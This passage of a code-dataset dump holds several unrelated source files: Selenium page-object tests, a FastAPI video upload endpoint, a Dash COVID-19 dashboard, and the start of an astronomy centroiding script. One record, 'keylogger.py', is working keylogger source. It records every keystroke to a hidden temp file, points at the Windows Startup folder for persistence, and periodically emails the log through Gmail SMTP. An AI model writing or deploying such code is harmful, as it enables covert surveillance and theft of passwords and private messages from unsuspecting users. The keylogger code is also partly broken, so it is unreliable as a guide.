{"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 58, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 78, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 87, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 103, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "111318308", "text": "import time\n\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\nfrom Config.TestData import TestData\nfrom Pages.BasePage import BasePage\n\n\nclass CommunicationPage(BasePage):\n\n \"\"\"By Locators\"\"\"\n Head_Title = (By.CSS_SELECTOR, 'h1.main-title')\n Download_CSV_Btn = (By.CSS_SELECTOR, 'button.down_excel')\n Total_Rows = (By.CSS_SELECTOR, 'tr.tr2')\n Calendar_Date_Range = (By.CSS_SELECTOR, 'input#dateRange')\n Left_Month_Year_Value = (By.XPATH, \"(//th[@class= 'month'])[1]\")\n Right_Month_Year_Value = (By.XPATH, \"(//th[@class= 'month'])[2]\")\n Calendar_Next_Btn = (By.CSS_SELECTOR, 'th.next.available')\n Calendar_Back_BTN = (By.CSS_SELECTOR, \"th.prev.available\")\n Calendar_Apply_Btn = (By.CSS_SELECTOR, 'button.applyBtn')\n Calendar_Date_Range_Display = (By.CSS_SELECTOR, 'span.drp-selected')\n Calendar_Left_Day = (By.XPATH, \"//div[@class='drp-calendar left'] //td[@class ='available' or @ class ='weekend \"\n \"available' or @ class ='active start-date active end-date available' or @ class \"\n \"='in-range available' or @ class ='weekend in-range available']\")\n\n Calendar_Right_Day = (By.XPATH, \"//div[@class='drp-calendar right']// td[@class ='available' or @ class ='weekend \"\n \"available' or @ class ='active start-date active end-date available' or @ class \"\n \"='in-range available' or @ class ='weekend in-range available']\")\n\n SelectAll_CheckBox = (By.CSS_SELECTOR, \"input.chkall\")\n All_ChkBox_On_Page = (By.CSS_SELECTOR, 'input.chkbx')\n Action_Edit_Button = (By.XPATH, \"(//p[@title = 'Edit'])[1]\")\n Action_Update_Button = (By.CSS_SELECTOR, \"button.btn-update\")\n Action_Cancel_Button = (By.XPATH, \"//button[text() = 'Cancel']\")\n Action_View_Button = (By.XPATH, \"(//button[@class = 'btn btn-primary btn-xs user'])[1]\")\n View_Customer_Chat_Window = (By.XPATH, \"(//h4[@class = 'modal-title'])[1]\")\n Status_Dropdown = (By.XPATH, \"(//select[@id = 'gender1'])[1]\")\n Status_DropDown_Values = (By.XPATH, \"(//select[@id = 'gender1'])[1]/option\")\n Edit_EmailID_txtfield = (By.XPATH, \"(//input[@id = 'email'])[1]\")\n Edit_Phone_txtfield = (By.XPATH, \"(//input[@id = 'phone'])[1]\")\n EmailId = (By.XPATH, \"//tbody//tr[1]//td[6]\")\n Phone = (By.XPATH, \"//tbody//tr[1]//td[7]\")\n Delete_Btn = (By.XPATH, \"(//p[@title = 'Delete'])[1]\")\n Delete_popup_OK_Btn = (By.CSS_SELECTOR, 'button.swal-button--danger')\n Row_to_be_Deleted = (By.XPATH, \"(//tbody//tr[1])[1]\")\n Filter_Leads_DropDown = (By.ID, 'filterLeads')\n All_Action_View_Button = (By.CSS_SELECTOR, 'button.btn.btn-primary.btn-xs.user')\n Customer_Chats = (By.XPATH, \"//div[@class = 'table_chat']/div\")\n All_Customer_Chat_Close_Btn = (By.XPATH, \"(//button[@class = 'modal_close'])\")\n Pagination_Next_Btn = (By.CSS_SELECTOR, 'span.glyphicon-chevron-right')\n Pagination_Previous_Btn = (By.CSS_SELECTOR, 'span.glyphicon-chevron-left')\n Pagination_First_Btn = (By.XPATH, \"//a[text() = 'First']\")\n Pagination_Last_Btn = (By.XPATH, \"//a[text() = 'Last']\")\n\n\n\n \"\"\"Page Actions\"\"\"\n\n def __init__(self, driver):\n super().__init__(driver)\n\n def is_headTitle_visble(self):\n return self.is_visible(self.Head_Title)\n\n def get_downloaded_filePath(self, file_path):\n self.do_click(self.Download_CSV_Btn)\n time.sleep(5)\n return self.is_file_exist(file_path)\n\n def click_calendarDateRange(self):\n self.do_click(self.Calendar_Date_Range)\n\n def click_select_all_checkbox_btn(self):\n self.do_click(self.SelectAll_CheckBox)\n\n def select_Leads_Dropdown(self):\n select = Select(self.get_element(self.Filter_Leads_DropDown))\n select.select_by_value('Leads')\n\n def check_select_all_checkbox_selected(self):\n return self.elements_are_selected(self.All_ChkBox_On_Page, self.SelectAll_CheckBox)\n\n def check_edit_elements(self):\n self.do_click(self.Action_Edit_Button)\n return self.is_visible(self.Action_Update_Button)\n\n def check_update_btn(self, emailText, phoneText):\n self.do_click(self.Action_Edit_Button)\n self.driver.find_element_by_xpath(\"(//input[@id = 'email'])[1]\").clear()\n self.do_send_keys(self.Edit_EmailID_txtfield, emailText)\n self.driver.find_element_by_xpath(\"(//input[@id = 'phone'])[1]\").clear()\n self.do_send_keys(self.Edit_Phone_txtfield, phoneText)\n self.do_click(self.Action_Update_Button)\n time.sleep(2)\n emailVal = self.get_element_text(self.EmailId)\n phoneVal = self.get_element_text(self.Phone)\n return [emailVal, phoneVal]\n\n def get_Name_in_row(self):\n return self.get_element_attribute(self.Row_to_be_Deleted, 'data-email')\n\n def delete_record_get_name(self):\n # beforeDeletionRows = self.count_total_rows()\n self.do_click(self.Delete_Btn)\n self.do_click(self.Delete_popup_OK_Btn)\n time.sleep(3)\n # afterDeletionRows = self.count_total_rows()\n\n # if beforeDeletionRows != afterDeletionRows:\n return self.get_element_attribute(self.Row_to_be_Deleted, 'data-email')\n # else:\n # return False\n\n\n def click_cancel_btn(self):\n self.do_click(self.Action_Edit_Button)\n if self.is_visible(self.Action_Update_Button):\n self.do_click(self.Action_Cancel_Button)\n time.sleep(1)\n return self.is_visible(self.Action_Edit_Button)\n\n def count_total_rows(self):\n Rows = self.get_all_elements(self.Total_Rows)\n return len(Rows)\n\n def date_picker_functionality(self, Expected_Left_Date,Expected_Right_Date):\n self.click_calendarDateRange()\n self.select_dates_in_calendar(Expected_Left_Date,Expected_Right_Date)\n self.do_click(self.Calendar_Apply_Btn)\n self.click_calendarDateRange()\n Date_Display =self.get_element_text(self.Calendar_Date_Range_Display)\n Left_Date = Date_Display.split(\"-\")[0].strip()\n Right_Date = Date_Display.split(\"-\")[1].strip()\n Left_Day = Left_Date.split(\"/\")[0]\n Right_Day = Right_Date.split(\"/\")[0]\n Expected_Left_Day = Expected_Left_Date.split(\" \")[0].strip()\n Expected_Right_Day = Expected_Right_Date.split(\" \")[0].strip()\n if Left_Day==Expected_Left_Day and Right_Day==Expected_Right_Day:\n return True\n else:\n return False\n\n def click_view_button(self):\n self.do_click(self.Action_View_Button)\n return self.is_element_displayed(self.View_Customer_Chat_Window)\n\n def check_status_dropdown_values(self):\n self.do_click(self.Action_Edit_Button)\n self.do_click(self.Status_Dropdown)\n status_dropdown_values = self.select_by_dropdown(self.Status_Dropdown)\n return status_dropdown_values\n\n def select_status_dropdown_values(self, Status_Value):\n self.do_click(self.Action_Edit_Button)\n self.do_click(self.Status_Dropdown)\n select = Select(self.get_element(self.Status_Dropdown))\n select.select_by_visible_text(Status_Value)\n self.do_click(self.Action_Update_Button)\n elements = self.get_all_elements(self.Status_DropDown_Values)\n for ele in elements:\n if ele.text == Status_Value:\n return self.is_element_displayed(ele.get_attribute('style'))\n\n def get_total_customer_chats(self):\n All_View_Buttons = self.get_all_elements(self.All_Action_View_Button)\n\n if len(All_View_Buttons) > 10:\n i = 1\n for view_button in All_View_Buttons:\n if view_button.is_displayed():\n view_button.click()\n time.sleep(1)\n len_customer_chats = len(self.get_all_elements(self.Customer_Chats))\n self.driver.find_element_by_xpath(\"(//button[text() = '×'])[\"+str(i)+\"]\").click()\n i = i+2\n time.sleep(1)\n else:\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(1)\n self.driver.find_element_by_css_selector(\"span.glyphicon.glyphicon-chevron-right\").click()\n view_button.click()\n time.sleep(1)\n len_customer_chats = len(self.get_all_elements(self.Customer_Chats))\n self.driver.find_element_by_xpath(\"(//button[text() = '×'])[\" + str(i) + \"]\").click()\n i = i + 2\n time.sleep(1)\n return len_customer_chats\n\n else:\n i = 1\n for view_button in All_View_Buttons:\n view_button.click()\n\n time.sleep(1)\n len_customer_chats = len(self.get_all_elements(self.Customer_Chats))\n self.driver.find_element_by_xpath(\"(//button[text() = '×'])[\" + str(i) + \"]\").click()\n i = i + 2\n time.sleep(1)\n return len_customer_chats\n\n\n def click_pagination_next_button(self):\n if self.count_total_rows() > 10:\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Next_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n for row in rows:\n if row.get_attribute('data-index') == '11' and row.get_attribute('style') == '':\n return True\n\n\n def click_pagination_previous_button(self):\n if self.count_total_rows() > 10:\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Next_Btn)\n self.do_click(self.Pagination_Previous_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n for row in rows:\n if row.get_attribute('data-index') == '1' and row.get_attribute('style') == '':\n return True\n\n def click_pagination_first_button(self):\n total_rows = self.count_total_rows()\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Last_Btn)\n self.do_click(self.Pagination_First_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n first_row = rows[0]\n if first_row.get_attribute('data-index') == '1':\n return True\n else:\n return False\n\n def click_pagination_Last_button(self):\n total_rows = self.count_total_rows()\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n self.do_click(self.Pagination_Last_Btn)\n rows = self.get_all_elements(self.Total_Rows)\n last_row = rows[-1]\n if last_row.get_attribute('data-index') == str(total_rows):\n return True\n else:\n return False\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "Pages/CommunicationPage.py", "file_name": "CommunicationPage.py", "file_ext": "py", "file_size_in_byte": 11155, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Pages.BasePage.BasePage", "line_number": 11, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 18, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 18, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 21, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 22, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 40, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 42, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 45, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 47, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 48, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 48, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 51, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 51, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 54, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 54, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 55, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.select.Select", "line_number": 79, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 121, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.select.Select", "line_number": 158, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 178, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 181, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 184, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 188, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 196, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 200, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 207, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 218, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 229, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 242, "usage_type": "call"}]} +{"seq_id": "336244656", "text": "from pynput.keyboard import Key, Listener\r\nimport os\r\nimport shutil\r\nimport time\r\nimport datetime\r\nimport winshell\r\nfrom win32com.client import Dispatch\r\nfrom shutil import copyfile\r\nimport tempfile\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.base import MIMEBase\r\nfrom email import encoders\r\nimport threading\r\nimport socket\r\n\r\nsave = tempfile.mkdtemp(\"screen\")\r\nprint(save)\r\ncwd = os.getcwd()\r\nsource = os.listdir()\r\n\r\ndateAndtime = datetime.datetime.now().strftime(\"-%Y-%m-%d-%H-%M-%S\")\r\nfilename = save+\"\\key_log\"+dateAndtime+\".txt\"\r\nopen(filename,\"w+\")\r\nkeys=[]\r\ncount = 0\r\ncountInternet = 0\r\nword = \"Key.\"\r\nusername = os.getlogin()\r\n\r\ndestination=r'C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'.format(username)\r\n\r\ndef is_connected():\r\n try:\r\n socket.create_connection((\"www.google.com\",80))\r\n return True\r\n except OSError:\r\n pass\r\n return False\r\n\r\ndef send_email():\r\n fromaddr = \"your email\"\r\n toaddr = \"your email\"\r\n password = \"your email pass\"\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = username\r\n body = \"TEXT\"\r\n msg.attach(MIMEText(dateAndtime,'plain'))\r\n attachment = open(filename, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(fromaddr, password)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr,text)\r\n server.quit\r\n\r\ndef write_file(keys):\r\n with open(filename,\"a\") as f:\r\n for key in keys:\r\n if key == 'Key.enter':\r\n f.write(\"\\n\")\r\n elif key == 'Key.space':\r\n f.write(key.replace(\"Key.space\",\" \"))\r\n elif key[:4] == word:\r\n pass\r\n else:\r\n f.write(key.replace(\"'\",\"\"))\r\n \r\ndef on_press(key):\r\n global keys, count, countInternet, filename\r\n keys.append(str(key))\r\n\r\n if len(keys) > 10:\r\n write_file(keys)\r\n if is_connected():\r\n count += 1\r\n print('connected {}'.format(count))\r\n if count > 100:\r\n count = 0\r\n t1 = threading.Thread(target=send_email, name='t1')\r\n t1.start()\r\n else:\r\n countInternet += 1\r\n print('not connected',countInternet)\r\n if countInternet > 10:\r\n countInternet = 0\r\n filename = filename.strip(save)\r\n for files in save:\r\n if file == filename:\r\n shutil.copy(files+\"t\",source)\r\n\r\n keys.clear()\r\nwith Listener(on_press=on_press) as listener:\r\n listener.join()\r\n \r\n \r\n \r\n", "sub_path": "keylogger.py", "file_name": "keylogger.py", "file_ext": "py", "file_size_in_byte": 3049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tempfile.mkdtemp", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 20, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.getlogin", "line_number": 30, "usage_type": "call"}, {"api_name": "socket.create_connection", "line_number": 36, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 46, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 51, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 53, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 55, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 55, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 58, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 88, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 98, "usage_type": "call"}, {"api_name": "pynput.keyboard.Listener", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "396512606", "text": "import shutil\nfrom typing import List\nfrom fastapi import APIRouter, UploadFile, File, Form\nfrom schemas import UploadVideo, GetVideo\nfrom models import Video, User\n\nvideo_router = APIRouter()\n\n\n@video_router.post(\"/\")\nasync def create_video(title: str = Form(...), description: str = Form(...), file: UploadFile = File(...)):\n info = UploadVideo(title=title, description=description)\n with open(f'{file.filename}', \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n user = await User.objects.first()\n return await Video.objects.create(file=file.filename, user=user, **info.dict())\n\n\n@video_router.get(\"/video/{video_pk}\")\nasync def get_video(video_pk: int):\n video = await Video.objects.select_related(\"user\").get(pk=video_pk)\n return video\n", "sub_path": "api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 773, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 11, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 11, "usage_type": "call"}, {"api_name": "fastapi.File", "line_number": 11, "usage_type": "call"}, {"api_name": "schemas.UploadVideo", "line_number": 12, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 14, "usage_type": "call"}, {"api_name": "models.User.objects.first", "line_number": 15, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Video.objects.create", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Video.objects.select_related", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "321770988", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 3 18:16:12 2020\r\n\r\n@author: Annie\r\n\"\"\"\r\n#import os\r\n#from random import randint\r\n#import flask\r\nimport dash\r\nimport dash_bootstrap_components as dbc\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport pandas as pd\r\n#import numpy as np\r\nimport plotly.graph_objects as go\r\n#import plotly.express as px\r\nimport datetime\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']#, dbc.themes.BOOTSTRAP]\r\n\r\n#configure app - might need more research on external stylesheets\r\napp = dash.Dash(__name__, external_stylesheets = [dbc.themes.BOOTSTRAP])\r\nserver = app.server\r\napp.config.suppress_callback_exceptions = True\r\napp.title='MSDS498'\r\n\r\n#data setup\r\nus_data = pd.read_json(path_or_buf='https://covidtracking.com/api/us/daily')\r\nstate_data = pd.read_json(path_or_buf='https://covidtracking.com/api/states/daily')\r\nstate_data['date'] = state_data['date'].astype(str)\r\nus_data['date'] = us_data['date'].astype(str)\r\nstate_data['date'] = state_data.apply(lambda x: datetime.datetime.strptime(x['date'], '%Y%m%d'), axis = 1)\r\nus_data['date'] = us_data.apply(lambda x: datetime.datetime.strptime(x['date'], '%Y%m%d'), axis = 1)\r\n\r\nstates = sorted(set(state_data['state']))\r\ngeo_values = ['positive', 'hospitalized','recovered', 'death', 'totalTestResults', 'positiveIncrease', 'deathIncrease', 'hospitalizedIncrease']\r\nrecent_date = max(state_data['date'])\r\nrecent_state_data = state_data.loc[state_data['date'] == recent_date]\r\nrecent_us_data = us_data.loc[us_data['date'] == recent_date]\r\n\r\n#MA WOW\r\nSevenDaysBack = recent_date + datetime.timedelta(days=-7)\r\nFourteenDaysBack = recent_date + datetime.timedelta(days=-14)\r\ndf_State_PastWeek = state_data[state_data['date']>=SevenDaysBack ]\r\ndf_State_PriorPastWeek = state_data[(state_data['date']>=FourteenDaysBack) & (state_data['date']23} {:>32} {:>40} {:>25} {:>15} {:>9}\".format(\"Star\", \"Background\",\n \"Centroid width: 3\", \"5\", \"7\",\n \"TruePositions\", \"LoLeftCoords\",\n \"Magnitude\",\n \"MinDiff\")\n line0b = \"{:>25} {:>12} {:>16} {:>14} {:>16} {:>20} {:>16} {:>17} {:>11} {:>11} {:>16} {:>2}\".format(\n \"x\", \"y\", \"x\", \"y\", \"x\", \"y\",\n \"TrueX\", \"TrueY\", \"LoLeftX\", \"LoLeftY\",\n \"x\", \"y\")\n lines4screenandfile = [line0, line0a, line0b]\n # write the file\n positions = [\"_Position1\", \"_Position2\"]\n if save_text_file:\n for pos in positions:\n output_file = os.path.join(output_file_path, \"centroids_Scene\"+repr(scene)+bg_choice+pos+\".txt\")\n f = open(output_file, \"w+\")\n f.write(line0+\"\\n\")\n f.close()\n if keep_ugly_stars and not keep_bad_stars:\n for pos in positions:\n out_file_gduglies = os.path.join(output_file_path, \"centroids_Scene\"+repr(scene)+bg_choice+pos+\"_GoodAndUglies.txt\")\n f = open(out_file_gduglies, \"w+\")\n f.write(line0+\"\\n\")\n f.close()\n\n # get the star files to run the TA algorithm on\n dir2test_list = TAf.get_raw_star_directory(path4starfiles, scene, shutters, noise)\n\n # run centroid algorithm on each position and save them into a text file\n x13, x15, x17 = np.array([]), np.array([]), np.array([])\n y13, y15, y17 = np.array([]), np.array([]), np.array([])\n x23, x25, x27 = np.array([]), np.array([]), np.array([])\n y23, y25, y27 = np.array([]), np.array([]), np.array([])\n min_diff_pixposX, min_diff_pixposY, mag_list = [], [], []\n loleftcoords_listX, loleftcoords_listY = [], []\n true_centerX, true_centerY = [], []\n\n for pos, dir2test in zip(positions, dir2test_list):\n dir_stars = glob(os.path.join(dir2test,\"postageout_star_*.fits\")) # get all star fits files in that directory\n #print(\"does dir2test exist?\", os.path.isdir(dir2test))\n for star in dir_stars:\n dir_star_number = int(os.path.basename(star).split()[1])\n # Test stars of detector of choice\n for st in stars_sample:\n if st == dir_star_number: #if str(st)+\" quad_ \" in star:\n if verbose:\n print (\"Will test stars in directory: \\n \", dir2test)\n print (\"Star: \", os.path.basename(star))\n # Make sure the file actually exists\n star_exists = os.path.isfile(star)\n if not star_exists:\n print (\"The file: \", star, \"\\n does NOT exist. Exiting the script.\")\n exit()\n\n # Obtain real star position and corresponding detector\n if st <= 100:\n detector = detectors[1]\n else:\n detector = detectors[0]\n idx_star = stars_sample.index(st)\n mag_i = magnitudes[idx_star]\n true_center_fulldet = [bench_xP1[idx_star], bench_yP1[idx_star]]\n\n #!!! WE ARE NOT USING POSITIONS 2 (SHIFTED) BECAUSE WE ARE FIXING POSITION 1 AS\n # REFERENCE POINT TO BEST REPRODUCE OBSERVATION MODE\n #if pos == \"_Position2\":\n # true_center_fulldet = [bench_xP2[idx_star], bench_yP2[idx_star]]\n\n # Read FITS image\n if verbose:\n print (\"Running centroid algorithm... \")\n #hdr = fits.getheader(star, 0)\n #print(\"** 